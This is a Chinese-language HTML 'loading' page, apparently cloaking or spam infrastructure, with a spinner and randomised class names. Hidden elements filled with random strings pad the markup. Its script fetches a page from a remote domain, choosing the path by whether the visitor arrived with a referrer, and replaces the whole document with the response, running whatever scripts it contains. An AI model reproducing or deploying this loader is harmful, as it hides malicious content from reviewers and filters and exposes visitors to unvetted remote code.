<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .r9yjl1duYcK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .r9yjl1duYcK .xkmmIpAJjV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .r9yjl1duYcK .content {
            line-height: 50px;
            text-align: center
        }

        .r9yjl1duYcK .img {
            width: 100%
        }

        .r9yjl1duYcK .QGJdas2 {
            text-align: center
        }

        .r9yjl1duYcK .QGJdas2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .r9yjl1duYcK .QGJdas2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .r9yjl1duYcK .QGJdas2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .r9yjl1duYcK .QGJdas2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .r9yjl1duYcK .QGJdas2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .r9yjl1duYcK .QGJdas2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .r9yjl1duYcK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function SRmx9Zi3vd6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var r9YZ2 = SRmx9Zi3vd6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ r9YZ2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ r9YZ2 +".html?a=share";
		}
		
        RjShSjk5i0=url+"#"+new Date().getTime();
        RjShSjk5i0 && function() {
            $.get(RjShSjk5i0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >vFdMw3GnKlmEgyCgPc0PXSQILbmDHWoqxI0EwPIo1xQo9sWk9idrcvYBfjRlVbqmznrn4ljLlvs3B7</b>
<p  style='display:none'>V9tFCBvi65DaxZKQ6IB75jiHlM0X5Bhxi3ilTL</p>
<li style='display:none' >YQ9xL0xqA0l0D3ZiuculYPfZAkZIeLXUgDqvRNw4jQwpW</li>
<div style='display:none'>nFJqLJPRKfaR5q5rKNVPQVu8X7H9oK7Nm6iiqNtPTUeWerfWZQI</div>
<b style='display:none' >vFdMw3GnKlmEgyCgPc0PXSQILbmDHWoqxI0EwPIo1xQo9sWk9idrcvYBfjRlVbqmznrn4ljLlvs3B7</b><div class="r9yjl1duYcK">
    <div class="xkmmIpAJjV">
        <div class="QGJdas2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>UoxyeZyrHl85uLL9Tn7v</span>
<img  src='' style='display:none'>
<p  style='display:none'>nfLjCtxKksdu7otV1BQJKyc7Ta8j7So45n1rfi47pCVrwi5Ojls0anHcZYxfTBXdQQfxWG</p>
<h1 style='display:none' >Cq0feq70sqyO05hlhvgJa0pysq8Mi9WmSxzYvFimzv99WT68eMbJ6vtFJKdP3IwuNj7jtJ81</h1>
<li style='display:none' >T5DA3VEBNc658imJEbhIZOsihBmbikzMdkvUyKCBKc04upeGWtC4gAZMPBDhpavr</li>
<b style='display:none' >P1jBjZjiOIAEAIIXMshOSGxSsnJj2zbnXgk</b></body>
</html>